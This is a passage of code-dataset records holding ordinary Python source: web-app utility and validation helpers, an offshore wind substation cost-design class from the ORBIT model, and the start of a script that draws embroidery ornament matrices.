replace a query parameter, and return the modified URL.\n\n Args:\n url: str. URL string which contains the query parameter.\n param_name: str. Parameter name to be removed.\n param_value: str. Set the parameter value, if it exists.\n\n Returns:\n str. Formated URL that has query parameter set or replaced.\n\n Raises:\n Exception. If the query parameter sent is not of string type,\n them this exception is raised.\n \"\"\"\n if not isinstance(param_name, python_utils.BASESTRING):\n raise Exception(\n 'URL query parameter name must be a string, received %s'\n % param_name)\n\n scheme, netloc, path, query_string, fragment = python_utils.url_split(url)\n query_params = python_utils.parse_query_string(query_string)\n\n query_params[param_name] = [param_value]\n new_query_string = python_utils.url_encode(query_params, doseq=True)\n\n return python_utils.url_unsplit(\n (scheme, netloc, path, new_query_string, fragment))\n\n\nclass JSONEncoderForHTML(json.JSONEncoder):\n \"\"\"Encodes JSON that is safe to embed in HTML.\"\"\"\n\n def encode(self, o):\n chunks = self.iterencode(o, True)\n return ''.join(chunks) if self.ensure_ascii else u''.join(chunks)\n\n def iterencode(self, o, _one_shot=False):\n chunks = super(\n JSONEncoderForHTML, self).iterencode(o, _one_shot=_one_shot)\n for chunk in chunks:\n yield chunk.replace('&', '\\\\u0026').replace(\n '<', '\\\\u003c').replace('>', '\\\\u003e')\n\n\ndef convert_to_hash(input_string, max_length):\n \"\"\"Convert a string to a SHA1 hash.\n\n Args:\n input_string: str. Input string for conversion to hash.\n max_length: int. Maximum Length of the generated hash.\n\n Returns:\n str. Hash Value generated from the input_String of the\n specified length.\n\n Raises:\n Exception. If the input string is not the instance of the str,\n them this exception is raised.\n \"\"\"\n if not isinstance(input_string, python_utils.BASESTRING):\n raise Exception(\n 'Expected string, received %s of type %s' %\n (input_string, type(input_string)))\n\n # Encodes strings using the character set [A-Za-z0-9].\n # Prefixing altchars with b' to ensure that all characters in encoded_string\n # remain encoded (otherwise encoded_string would be of type unicode).\n encoded_string = base64.b64encode(\n hashlib.sha1(python_utils.convert_to_bytes(input_string)).digest(),\n altchars=b'ab'\n ).replace('=', 'c')\n\n return encoded_string[:max_length]\n\n\ndef base64_from_int(value):\n \"\"\"Converts the number into base64 representation.\n\n Args:\n value: int. Integer value for conversion into base64.\n\n Returns:\n *. Returns the base64 representation of the number passed.\n \"\"\"\n return base64.b64encode(bytes([value]))\n\n\ndef get_time_in_millisecs(datetime_obj):\n \"\"\"Returns time in milliseconds since the Epoch.\n\n Args:\n datetime_obj: datetime. An object of type datetime.datetime.\n\n Returns:\n float. The time in milliseconds since the Epoch.\n \"\"\"\n msecs = time.mktime(datetime_obj.timetuple()) * 1000.0\n return msecs + python_utils.divide(datetime_obj.microsecond, 1000.0)\n\n\ndef convert_naive_datetime_to_string(datetime_obj):\n \"\"\"Returns a human-readable string representing the naive datetime object.\n\n Args:\n datetime_obj: datetime. An object of type datetime.datetime. Must be a\n naive datetime object.\n\n Returns:\n str. The string representing the naive datetime object.\n \"\"\"\n return datetime_obj.strftime(DATETIME_FORMAT)\n\n\ndef convert_string_to_naive_datetime_object(date_time_string):\n \"\"\"Returns the naive datetime object equivalent of the date string.\n\n Args:\n date_time_string: str. The string format representing the datetime\n object in the format: Month/Day/Year,\n Hour:Minute:Second:MicroSecond.\n\n Returns:\n datetime. An object of type naive datetime.datetime corresponding to\n that string.\n \"\"\"\n return datetime.datetime.strptime(date_time_string, DATETIME_FORMAT)\n\n\ndef get_current_time_in_millisecs():\n \"\"\"Returns time in milliseconds since the Epoch.\n\n Returns:\n float. The time in milliseconds since the Epoch.\n \"\"\"\n return get_time_in_millisecs(datetime.datetime.utcnow())\n\n\ndef get_human_readable_time_string(time_msec):\n \"\"\"Given a time in milliseconds since the epoch, get a human-readable\n time string for the admin dashboard.\n\n Args:\n time_msec: float. Time in milliseconds since the Epoch.\n\n Returns:\n str. A string representing the time.\n \"\"\"\n return time.strftime(\n '%B %d %H:%M:%S', time.gmtime(python_utils.divide(time_msec, 1000.0)))\n\n\ndef create_string_from_largest_unit_in_timedelta(timedelta_obj):\n \"\"\"Given the timedelta object, find the largest nonzero time unit and\n return that value, along with the time unit, as a human readable string.\n The returned string is not localized.\n\n Args:\n timedelta_obj: datetime.timedelta. A datetime timedelta object. Datetime\n timedelta objects are created when you subtract two datetime\n objects.\n\n Returns:\n str. A human readable string representing the value of the largest\n nonzero time unit, along with the time units. If the largest time unit\n is seconds, 1 minute is returned. The value is represented as an integer\n in the string.\n\n Raises:\n Exception. If the provided timedelta is not positive.\n \"\"\"\n total_seconds = timedelta_obj.total_seconds()\n if total_seconds <= 0:\n raise Exception(\n 'Expected a positive timedelta, received: %s.' % total_seconds)\n elif timedelta_obj.days != 0:\n return '%s day%s' % (\n int(timedelta_obj.days), 's' if timedelta_obj.days > 1 else '')\n else:\n number_of_hours, remainder = divmod(total_seconds, SECONDS_IN_HOUR)\n number_of_minutes, _ = divmod(remainder, SECONDS_IN_MINUTE)\n if number_of_hours != 0:\n return '%s hour%s' % (\n int(number_of_hours), 's' if number_of_hours > 1 else '')\n elif number_of_minutes > 1:\n return '%s minutes' % int(number_of_minutes)\n # Round any seconds up to one minute.\n else:\n return '1 minute'\n\n\ndef are_datetimes_close(later_datetime, earlier_datetime):\n \"\"\"Given two datetimes, determines whether they are separated by less than\n feconf.PROXIMAL_TIMEDELTA_SECS seconds.\n\n Args:\n later_datetime: datetime. The later datetime.\n earlier_datetime: datetime. The earlier datetime.\n\n Returns:\n bool. True if difference between two datetimes is less than\n feconf.PROXIMAL_TIMEDELTA_SECS seconds otherwise false.\n \"\"\"\n difference_in_secs = (later_datetime - earlier_datetime).total_seconds()\n return difference_in_secs < feconf.PROXIMAL_TIMEDELTA_SECS\n\n\ndef generate_random_string(length):\n \"\"\"Generates a random string of the specified length.\n\n Args:\n length: int. Length of the string to be generated.\n\n Returns:\n str. Random string of specified length.\n \"\"\"\n return base64.urlsafe_b64encode(os.urandom(length))[:length]\n\n\ndef generate_new_session_id():\n \"\"\"Generates a new session id.\n\n Returns:\n str. Random string of length 24.\n \"\"\"\n return generate_random_string(24)\n\n\ndef vfs_construct_path(base_path, *path_components):\n \"\"\"Mimics behavior of os.path.join on Posix machines.\n\n Args:\n base_path: str. The initial path upon which components would be added.\n *path_components: list(str). Components that would be added to the path.\n\n Returns:\n str. The path that is obtained after adding the components.\n \"\"\"\n return os.path.join(base_path, *path_components)\n\n\ndef vfs_normpath(path):\n \"\"\"Normalize path from posixpath.py, eliminating double slashes, etc.\n\n Args:\n path: str. Path that is to be normalized.\n\n Returns:\n str. Path if it is not null else a dot string.\n \"\"\"\n return os.path.normpath(path)\n\n\ndef require_valid_name(name, name_type, allow_empty=False):\n \"\"\"Generic name validation.\n\n Args:\n name: str. The name to validate.\n name_type: str. A human-readable string, like 'the exploration title' or\n 'a state name'. This will be shown in error messages.\n allow_empty: bool. If True, empty strings are allowed.\n\n Raises:\n Exception. Name isn't a string.\n Exception. The length of the name_type isn't between\n 1 and 50.\n Exception. Name starts or ends with whitespace.\n Exception. Adjacent whitespace in name_type isn't collapsed.\n Exception. Invalid character is present in name.\n \"\"\"\n if not isinstance(name, python_utils.BASESTRING):\n raise ValidationError('%s must be a string.' % name)\n\n if allow_empty and name == '':\n return\n\n # This check is needed because state names are used in URLs and as ids\n # for statistics, so the name length should be bounded above.\n if len(name) > 50 or len(name) < 1:\n raise ValidationError(\n 'The length of %s should be between 1 and 50 '\n 'characters; received %s' % (name_type, name))\n\n if name[0] in string.whitespace or name[-1] in string.whitespace:\n raise ValidationError(\n 'Names should not start or end with whitespace.')\n\n if re.search(r'\\s\\s+', name):\n raise ValidationError(\n 'Adjacent whitespace in %s should be collapsed.' % name_type)\n\n for character in constants.INVALID_NAME_CHARS:\n if character in name:\n raise ValidationError(\n 'Invalid character %s in %s: %s' %\n (character, name_type, name))\n\n\ndef require_valid_url_fragment(name, name_type, allowed_length):\n \"\"\"Generic URL fragment validation.\n\n Args:\n name: str. The name to validate.\n name_type: str. A human-readable string, like 'topic url fragment'.\n This will be shown in error messages.\n allowed_length: int. Allowed length for the name.\n\n Raises:\n Exception. Name is not a string.\n Exception. Name is empty.\n Exception. The length of the name_type is not correct.\n Exception. Invalid character is present in the name.\n \"\"\"\n if not isinstance(name, python_utils.BASESTRING):\n raise ValidationError(\n '%s field must be a string. Received %s.' % (name_type, name))\n\n if name == '':\n raise ValidationError(\n '%s field should not be empty.' % name_type)\n\n if len(name) > allowed_length:\n raise ValidationError(\n '%s field should not exceed %d characters, '\n 'received %s.' % (name_type, allowed_length, name))\n\n if not re.match(constants.VALID_URL_FRAGMENT_REGEX, name):\n raise ValidationError(\n '%s field contains invalid characters. Only lowercase words'\n ' separated by hyphens are allowed. Received %s.' % (\n name_type, name))\n\n\ndef require_valid_thumbnail_filename(thumbnail_filename):\n \"\"\"Generic thumbnail filename validation.\n\n Args:\n thumbnail_filename: str. The thumbnail filename to validate.\n \"\"\"\n if thumbnail_filename is not None:\n if not isinstance(thumbnail_filename, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected thumbnail filename to be a string, received %s'\n % thumbnail_filename)\n if thumbnail_filename.rfind('.') == 0:\n raise ValidationError(\n 'Thumbnail filename should not start with a dot.')\n if '/' in thumbnail_filename or '..' in thumbnail_filename:\n raise ValidationError(\n 'Thumbnail filename should not include slashes or '\n 'consecutive dot characters.')\n if '.' not in thumbnail_filename:\n raise ValidationError(\n 'Thumbnail filename should include an extension.')\n\n dot_index = thumbnail_filename.rfind('.')\n extension = thumbnail_filename[dot_index + 1:].lower()\n if extension != 'svg':\n raise ValidationError(\n 'Expected a filename ending in svg, received %s' %\n thumbnail_filename)\n\n\ndef require_valid_meta_tag_content(meta_tag_content):\n \"\"\"Generic meta tag content validation.\n\n Args:\n meta_tag_content: str. The meta tag content to validate.\n \"\"\"\n if not isinstance(meta_tag_content, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected meta tag content to be a string, received %s'\n % meta_tag_content)\n if len(meta_tag_content) > constants.MAX_CHARS_IN_META_TAG_CONTENT:\n raise ValidationError(\n 'Meta tag content should not be longer than %s characters.'\n % constants.MAX_CHARS_IN_META_TAG_CONTENT)\n\n\ndef require_valid_page_title_fragment_for_web(page_title_fragment_for_web):\n \"\"\"Generic page title fragment validation.\n\n Args:\n page_title_fragment_for_web: str. The page title fragment to validate.\n\n Raises:\n Exception. Page title fragment is not a string.\n Exception. Page title fragment is too lengthy.\n \"\"\"\n max_chars_in_page_title_frag_for_web = (\n constants.MAX_CHARS_IN_PAGE_TITLE_FRAGMENT_FOR_WEB)\n if not isinstance(page_title_fragment_for_web, python_utils.BASESTRING):\n raise ValidationError(\n 'Expected page title fragment to be a string, received %s'\n % page_title_fragment_for_web)\n if len(page_title_fragment_for_web) > max_chars_in_page_title_frag_for_web:\n raise ValidationError(\n 'Page title fragment should not be longer than %s characters.'\n % constants.MAX_CHARS_IN_PAGE_TITLE_FRAGMENT_FOR_WEB)\n\n\ndef capitalize_string(input_string):\n \"\"\"Converts the first character of a string to its uppercase equivalent (if\n it's a letter), and returns the result.\n\n Args:\n input_string: str. String to process (to capitalize).\n\n Returns:\n str. Capitalizes the string.\n \"\"\"\n # This guards against empty strings.\n if input_string:\n return input_string[0].upper() + input_string[1:]\n else:\n return input_string\n\n\ndef get_hex_color_for_category(category):\n \"\"\"Returns the category, it returns the color associated with the category,\n if the category is present in the app constants else given a default color.\n\n Args:\n category: str. Category to get color.\n\n Returns:\n str. Color assigned to that category.\n \"\"\"\n return (\n constants.CATEGORIES_TO_COLORS[category]\n if category in constants.CATEGORIES_TO_COLORS\n else constants.DEFAULT_COLOR)\n\n\ndef get_thumbnail_icon_url_for_category(category):\n \"\"\"Returns the category, it returns the associated thumbnail icon, if the\n category is present in the app constants else given a default thumbnail.\n\n Args:\n category: str. Category to get Thumbnail icon.\n\n Returns:\n str. Path to the Thumbnail Icon assigned to that category.\n \"\"\"\n icon_name = (\n category if category in constants.CATEGORIES_TO_COLORS\n else constants.DEFAULT_THUMBNAIL_ICON)\n # Remove all spaces from the string.\n return '/subjects/%s.svg' % (icon_name.replace(' ', ''))\n\n\ndef is_supported_audio_language_code(language_code):\n \"\"\"Checks if the given language code is a supported audio language code.\n\n Args:\n language_code: str. The language code.\n\n Returns:\n bool. Whether the language code is supported audio language code or not.\n \"\"\"\n language_codes = [lc['id'] for lc in constants.SUPPORTED_AUDIO_LANGUAGES]\n return language_code in language_codes\n\n\ndef is_valid_language_code(language_code):\n \"\"\"Checks if the given language code is a valid language code.\n\n Args:\n language_code: str. The language code.\n\n Returns:\n bool. Whether the language code is valid or not.\n \"\"\"\n language_codes = [\n lc['code'] for lc in constants.SUPPORTED_CONTENT_LANGUAGES]\n return language_code in language_codes\n\n\ndef get_supported_audio_language_description(language_code):\n \"\"\"Returns the language description for the given language code.\n\n Args:\n language_code: str. The language code for which the description is\n required.\n\n Returns:\n str. The language description for the given language code.\n\n Raises:\n Exception. If the given language code is unsupported.\n \"\"\"\n for language in constants.SUPPORTED_AUDIO_LANGUAGES:\n if language['id'] == language_code:\n return language['description']\n raise Exception('Unsupported audio language code: %s' % language_code)\n\n\ndef is_user_id_valid(\n user_id, allow_system_user_id=False, allow_pseudonymous_id=False):\n \"\"\"Verify that the user ID is in a correct format or that it belongs to\n a system user.\n\n Args:\n user_id: str. The user ID to be checked.\n allow_system_user_id: bool. Whether to allow system user ID.\n allow_pseudonymous_id: bool. Whether to allow pseudonymized ID.\n\n Returns:\n bool. True when the ID is in a correct format or if the ID belongs to\n a system user, False otherwise.\n \"\"\"\n if allow_system_user_id and user_id in feconf.SYSTEM_USERS.keys():\n return True\n\n if allow_pseudonymous_id and is_pseudonymous_id(user_id):\n return True\n\n return bool(re.match(feconf.USER_ID_REGEX, user_id))\n\n\ndef is_pseudonymous_id(user_id):\n \"\"\"Check that the ID is a pseudonymous one.\n\n Args:\n user_id: str. The ID to be checked.\n\n Returns:\n bool. Whether the ID represents a pseudonymous user.\n \"\"\"\n return bool(re.match(feconf.PSEUDONYMOUS_ID_REGEX, user_id))\n\n\ndef unescape_encoded_uri_component(escaped_string):\n \"\"\"Unescape a string that is encoded with encodeURIComponent.\n\n Args:\n escaped_string: str. String that is encoded with encodeURIComponent.\n\n Returns:\n str. Decoded string that was initially encoded with encodeURIComponent.\n \"\"\"\n return python_utils.urllib_unquote(escaped_string).decode('utf-8')\n\n\ndef snake_case_to_camel_case(snake_str):\n \"\"\"Converts a string in snake_case to camelCase.\n\n Args:\n snake_str: str. String that is in snake_case.\n\n Returns:\n str. Converted string that is in camelCase.\n \"\"\"\n components = snake_str.split('_')\n # We capitalize the first letter of each component except the first one\n # with the 'title' method and join them together.\n return components[0] + ''.join(x.title() for x in components[1:])\n\n\ndef get_asset_dir_prefix():\n \"\"\"Returns prefix for asset directory depending whether dev or prod.\n It is used as a prefix in urls for images, css and script files.\n\n Returns:\n str. Prefix '/build' if constants.DEV_MODE is false, otherwise\n null string.\n \"\"\"\n asset_dir_prefix = ''\n if not constants.DEV_MODE:\n asset_dir_prefix = '/build'\n\n return asset_dir_prefix\n\n\ndef get_hashable_value(value):\n \"\"\"This function returns a hashable version of the input JSON-like value.\n\n It converts the built-in sequences into their hashable counterparts\n {list: tuple, dict: (sorted tuple of pairs)}. Additionally, their\n elements are converted to hashable values through recursive calls. All\n other value types are assumed to already be hashable.\n\n Args:\n value: *. Some JSON-like object, that is, an object made-up of only:\n lists, dicts, strings, ints, bools, None. Types can be nested in\n each other.\n\n Returns:\n *. A new object that will always have the same hash for \"equivalent\"\n values.\n \"\"\"\n if isinstance(value, list):\n return tuple(get_hashable_value(e) for e in value)\n elif isinstance(value, dict):\n return tuple(sorted(\n # Dict keys are already hashable, only values need converting.\n (k, get_hashable_value(v)) for k, v in value.items()))\n else:\n return value\n\n\ndef compress_to_zlib(data):\n \"\"\"Compress the data to zlib format for efficient storage and communication.\n\n Args:\n data: str. Data to be compressed.\n\n Returns:\n str. Compressed data string.\n \"\"\"\n return zlib.compress(data)\n\n\ndef decompress_from_zlib(data):\n \"\"\"Decompress the zlib compressed data.\n\n Args:\n data: str. Data to be decompressed.\n\n Returns:\n str. Decompressed data string.\n \"\"\"\n return zlib.decompress(data)\n\n\ndef compute_list_difference(list_a, list_b):\n \"\"\"Returns the set difference of two lists.\n\n Args:\n list_a: list. The first list.\n list_b: list. The second list.\n\n Returns:\n list. List of the set difference of list_a - list_b.\n \"\"\"\n return list(set(list_a) - set(list_b))\n\n\nclass OrderedCounter(collections.Counter, collections.OrderedDict):\n \"\"\"Counter that remembers the order elements are first encountered.\"\"\"\n\n pass\n"} {"ext": "py", "sha": "1a2fdf100886bc09e642bf3cf8b1059a3f23e0c7", "content": "from .ai import *\nfrom .condition import *\nfrom .debug import *\nfrom .diplomacy import *\nfrom .effect import *\nfrom .player import *\nfrom .resource import *\nfrom .tile import *\nfrom .trigger import *\nfrom .unit import *\nfrom .units import *"} {"ext": "py", "sha": "1a2fe071196781a69531862b2a578f9971f3bd29", "content": "\"\"\"Provides the 'OffshoreSubstationDesign` class.\"\"\"\n\n__author__ = \"Jake Nunemaker\"\n__copyright__ = \"Copyright 2020, National Renewable Energy Laboratory\"\n__maintainer__ = \"Jake Nunemaker\"\n__email__ = \"Jake.Nunemaker@nrel.gov\"\n\n\nimport numpy as np\n\nfrom ORBIT.phases.design import DesignPhase\n\n\nclass OffshoreSubstationDesign(DesignPhase):\n \"\"\"Offshore Substation Design Class.\"\"\"\n\n expected_config = {\n \"site\": {\"depth\": \"m\"},\n \"plant\": {\"num_turbines\": \"int\"},\n \"turbine\": {\"turbine_rating\": \"MW\"},\n \"substation_design\": {\n \"mpt_cost_rate\": \"USD/MW (optional)\",\n \"topside_fab_cost_rate\": \"USD/t (optional)\",\n \"topside_design_cost\": \"USD (optional)\",\n \"shunt_cost_rate\": \"USD/MW (optional)\",\n \"switchgear_cost\": \"USD (optional)\",\n \"backup_gen_cost\": \"USD (optional)\",\n \"workspace_cost\": \"USD (optional)\",\n \"other_ancillary_cost\": \"USD (optional)\",\n \"topside_assembly_factor\": \"float (optional)\",\n \"oss_substructure_cost_rate\": \"USD/t (optional)\",\n \"oss_pile_cost_rate\": \"USD/t (optional)\",\n \"num_substations\": \"int (optional)\",\n },\n }\n\n output_config = {\n \"num_substations\": \"int\",\n \"offshore_substation_topside\": \"dict\",\n \"offshore_substation_substructure\": \"dict\",\n }\n\n def __init__(self, config, **kwargs):\n \"\"\"\n Creates an instance of OffshoreSubstationDesign.\n\n Parameters\n ----------\n config : dict\n \"\"\"\n\n config = self.initialize_library(config, **kwargs)\n self.config = self.validate_config(config)\n self._outputs = {}\n\n def run(self):\n \"\"\"Main run function.\"\"\"\n\n self.calc_substructure_length()\n self.calc_substructure_deck_space()\n self.calc_topside_deck_space()\n\n self.calc_num_mpt_and_rating()\n self.calc_mpt_cost()\n self.calc_topside_mass_and_cost()\n self.calc_shunt_reactor_cost()\n self.calc_switchgear_cost()\n self.calc_ancillary_system_cost()\n self.calc_assembly_cost()\n self.calc_substructure_mass_and_cost()\n\n self._outputs[\"offshore_substation_substructure\"] = {\n \"type\": \"Monopile\", # Substation install only supports monopiles\n \"deck_space\": self.substructure_deck_space,\n \"mass\": self.substructure_mass,\n \"length\": self.substructure_length,\n \"unit_cost\": self.substructure_cost,\n }\n\n self._outputs[\"offshore_substation_topside\"] = {\n \"deck_space\": self.topside_deck_space,\n \"mass\": self.topside_mass,\n \"unit_cost\": self.substation_cost,\n }\n\n self._outputs[\"num_substations\"] = self.num_substations\n\n @property\n def substation_cost(self):\n \"\"\"Returns total procuremet cost of the topside.\"\"\"\n\n return (\n self.mpt_cost\n + self.topside_cost\n + self.shunt_reactor_cost\n + self.switchgear_costs\n + self.ancillary_system_costs\n + self.land_assembly_cost\n )\n\n @property\n def total_cost(self):\n \"\"\"Returns total procurement cost of the substation(s).\"\"\"\n\n if not self._outputs:\n raise Exception(\"Has OffshoreSubstationDesign been ran yet?\")\n\n return (\n self.substructure_cost + self.substation_cost\n ) * self.num_substations\n\n def calc_substructure_length(self):\n \"\"\"\n Calculates substructure length as the site depth + 10m\n \"\"\"\n\n self.substructure_length = self.config[\"site\"][\"depth\"] + 10\n\n def calc_substructure_deck_space(self):\n \"\"\"\n Calculates required deck space for the substation substructure.\n\n Coming soon!\n \"\"\"\n\n self.substructure_deck_space = 1\n\n def calc_topside_deck_space(self):\n \"\"\"\n Calculates required deck space for the substation topside.\n\n Coming soon!\n \"\"\"\n\n self.topside_deck_space = 1\n\n def calc_num_mpt_and_rating(self):\n \"\"\"\n Calculates the number of main power transformers (MPTs) and their rating.\n\n Parameters\n ----------\n num_turbines : int\n turbine_rating : float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n\n num_turbines = self.config[\"plant\"][\"num_turbines\"]\n turbine_rating = self.config[\"turbine\"][\"turbine_rating\"]\n capacity = num_turbines * turbine_rating\n\n self.num_substations = _design.get(\n \"num_substations\", int(np.ceil(capacity / 500))\n )\n self.num_mpt = np.ceil(\n num_turbines * turbine_rating / (250 * self.num_substations)\n )\n self.mpt_rating = (\n round(\n (\n (num_turbines * turbine_rating * 1.15)\n / (self.num_mpt * self.num_substations)\n )\n / 10.0\n )\n * 10.0\n )\n\n def calc_mpt_cost(self):\n \"\"\"\n Calculates the total cost for all MPTs.\n\n Parameters\n ----------\n mpt_cost_rate : float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n mpt_cost_rate = _design.get(\"mpt_cost_rate\", 12500)\n\n self.mpt_cost = self.mpt_rating * self.num_mpt * mpt_cost_rate\n\n def calc_topside_mass_and_cost(self):\n \"\"\"\n Calculates the mass and cost of the substation topsides.\n\n Parameters\n ----------\n topside_fab_cost_rate : int | float\n topside_design_cost: int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n topside_fab_cost_rate = _design.get(\"topside_fab_cost_rate\", 14500)\n topside_design_cost = _design.get(\"topside_design_cost\", 4.5e6)\n\n self.topside_mass = 3.85 * self.mpt_rating * self.num_mpt + 285\n self.topside_cost = (\n self.topside_mass * topside_fab_cost_rate + topside_design_cost\n )\n\n def calc_shunt_reactor_cost(self):\n \"\"\"\n Calculates the cost of the shunt reactor.\n\n Parameters\n ----------\n shunt_cost_rate : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n shunt_cost_rate = _design.get(\"shunt_cost_rate\", 35000)\n\n self.shunt_reactor_cost = (\n self.mpt_rating * self.num_mpt * shunt_cost_rate * 0.5\n )\n\n def calc_switchgear_cost(self):\n \"\"\"\n Calculates the cost of the switchgear.\n\n Parameters\n ----------\n switchgear_cost : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n switchgear_cost = _design.get(\"switchgear_cost\", 14.5e5)\n\n self.switchgear_costs = self.num_mpt * switchgear_cost\n\n def calc_ancillary_system_cost(self):\n \"\"\"\n Calculates cost of ancillary systems.\n\n Parameters\n ----------\n backup_gen_cost : int | float\n workspace_cost : int | float\n other_ancillary_cost : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n backup_gen_cost = _design.get(\"backup_gen_cost\", 1e6)\n workspace_cost = _design.get(\"workspace_cost\", 2e6)\n other_ancillary_cost = _design.get(\"other_ancillary_cost\", 3e6)\n\n self.ancillary_system_costs = (\n backup_gen_cost + workspace_cost + other_ancillary_cost\n )\n\n def calc_assembly_cost(self):\n \"\"\"\n Calculates the cost of assembly on land.\n\n Parameters\n ----------\n topside_assembly_factor : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n topside_assembly_factor = _design.get(\"topside_assembly_factor\", 0.075)\n self.land_assembly_cost = (\n self.switchgear_costs\n + self.shunt_reactor_cost\n + self.ancillary_system_costs\n ) * topside_assembly_factor\n\n def calc_substructure_mass_and_cost(self):\n \"\"\"\n Calculates the mass and associated cost of the substation substructure.\n\n Parameters\n ----------\n oss_substructure_cost_rate : int | float\n oss_pile_cost_rate : int | float\n \"\"\"\n\n _design = self.config.get(\"substation_design\", {})\n oss_substructure_cost_rate = _design.get(\n \"oss_substructure_cost_rate\", 3000\n )\n oss_pile_cost_rate = _design.get(\"oss_pile_cost_rate\", 0)\n\n substructure_mass = 0.4 * self.topside_mass\n substructure_pile_mass = 8 * substructure_mass ** 0.5574\n self.substructure_cost = (\n substructure_mass * oss_substructure_cost_rate\n + substructure_pile_mass * oss_pile_cost_rate\n )\n\n self.substructure_mass = substructure_mass + substructure_pile_mass\n\n @property\n def design_result(self):\n \"\"\"\n Returns the results of self.run().\n \"\"\"\n\n if not self._outputs:\n raise Exception(\"Has OffshoreSubstationDesign been ran yet?\")\n\n return self._outputs\n\n @property\n def detailed_output(self):\n \"\"\"Returns detailed phase information.\"\"\"\n\n _outputs = {\n \"num_substations\": self.num_substations,\n \"substation_mpt_rating\": self.mpt_rating,\n \"substation_topside_mass\": self.topside_mass,\n \"substation_topside_cost\": self.topside_cost,\n \"substation_substructure_mass\": self.substructure_mass,\n \"substation_substructure_cost\": self.substructure_cost,\n }\n\n return _outputs\n"} {"ext": "py", "sha": "1a2fe0cee1c38ac5f162959121d9c4410c81ef8d", "content": "# -------------------------------------------------------------------------------------------------\n# Embroidery\n# -------------------------------------------------------------------------------------------------\n#\n# The program is to design simple ornament matrices for Christmas fair. It creates a matrix\n# where 0 means an empty pixel, and positive integers mean different colors.\n#\n# -------------------------------------------------------------------------------------------------\n\nNULL_CELL = \"\" # null cell is a cell to fill with some color in the next step of create triangle function\nZERO_CELL = 0\n\n\n# ---------------------------------------- main functions -----------------------------------------\n\ndef draw_rectangle(width, height, border_color=1, fill_color=1, border_width=1):\n '''\n Creats the rectangle matrix like this:\n\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 2 2 2 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 2 2 2 1 1\n 1 1 1 1 1 1 1 1 2 2 2 2 2 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n '''\n matrix = []\n for row_no in range(height):\n row = []\n for col_no in range(width):\n fill_pattern = border_color if any([\n row_no + 1 <= border_width, # first row\n height - row_no <= border_width, # last row\n col_no + 1 <= border_width, # first column\n height - col_no <= border_width # last column\n ]) else fill_color\n row.append(fill_pattern)\n matrix.append(row)\n\n return matrix\n\n\ndef draw_triangle(height, border_color=1, fill_color=1):\n '''\n Creats the rectangle matrix like this:\n\n 0 0 0 1 0 0 0 0 0 0 1 0 0 0\n 0 0 1 1 1 0 0 0 0 1 2 1 0 0\n 0 1 1 1 1 1 0 0 1 2 2 2 1 0\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n '''\n width = 2 * height - 1\n\n return create_triangle(height, width, fill_color, border_color)\n\n\ndef draw_christmas_tree(blocks, border_color=1, fill_color=1):\n '''\n Creats the rectangle matrix like this:\n\n 0 0 0 0 0 1 0 0 0 0 0\n 0 0 0 0 1 2 1 0 0 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 0 0 1 2 1 0 0 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 0 0 1 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 1 0\n 0 0 1 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 1 0\n 1 1 1 1 1 1 1 1 1 1 1\n '''\n height = 3\n width = 5 + (blocks - 1) * 2 # 5 - the base of the tree in the first block; 2 - distance between the bases of the trees of the next blocks\n base_width = 5\n\n matrix = []\n for block in range(blocks - 1): # -1 -> without the last row\n matrix.extend(create_triangle(height, width, fill_color, border_color, False, base_width + block * 2))\n matrix.extend(create_triangle(height, width, fill_color, border_color, True, base_width + (block + 1) * 2)) # the last row with border\n\n return matrix\n\n\ndef draw_circle(radius, border_color=1, fill_color=1, half=True):\n '''\n Creats the circle matrix like this:\n\n 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 1 1 1 2 2 2 2 2 2 2 1 1 1 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 1 1 0 0 0 0 0 0 0\n 0 0 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0 0 0\n 0 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0 0\n 0 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0 0\n 0 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0 0\n 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0\n 0 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 0 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1 0\n 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 1\n 1 2 2 2 2 